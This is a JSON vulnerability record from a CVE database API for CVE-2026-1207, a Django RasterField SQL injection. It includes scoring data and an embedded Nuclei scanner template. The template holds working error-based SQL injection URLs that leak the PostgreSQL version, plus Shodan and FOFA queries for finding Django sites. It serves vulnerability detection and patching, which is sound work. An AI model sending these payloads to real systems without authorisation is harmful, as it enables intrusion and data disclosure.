{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-1207/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-1207/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-1207/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-1207/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-1207/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-1207"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-1207"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.13251,
      "kev": false,
      "percentile": 0.96204
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2026/CVE-2026-1207.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2026-1207\n\ninfo:\n  name: Django RasterField - SQL Injection\n  author: omarkurt\n  severity: high\n  description: |\n    Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.\n  impact: |\n    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.\n  remediation: |\n    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207\n    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/\n    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 8.1\n    cve-id: CVE-2026-1207\n    epss-score: 0.13251\n    epss-percentile: 0.96204\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: djangoproject\n    product: django\n    shodan-query: 'django'\n    fofa-query: 'app=\"Django\"'\n  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--\"\n      - \"{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--\"\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains_all(body, \"invalid input syntax for type integer\", \"PostgreSQL\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: postgres_version\n        part: body\n        group: 1\n        regex:\n          - 'PostgreSQL ([0-9]+\\.[0-9]+)'\n# digest: 490a00463044022032fe22e36bed3c804975be4d305fcca44b68c25d86743756e01ec10718471ce8022078c4e147782a16f23f7e770666a137be94377082ac4364298cdf8659dc5d157b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2026-1207"
}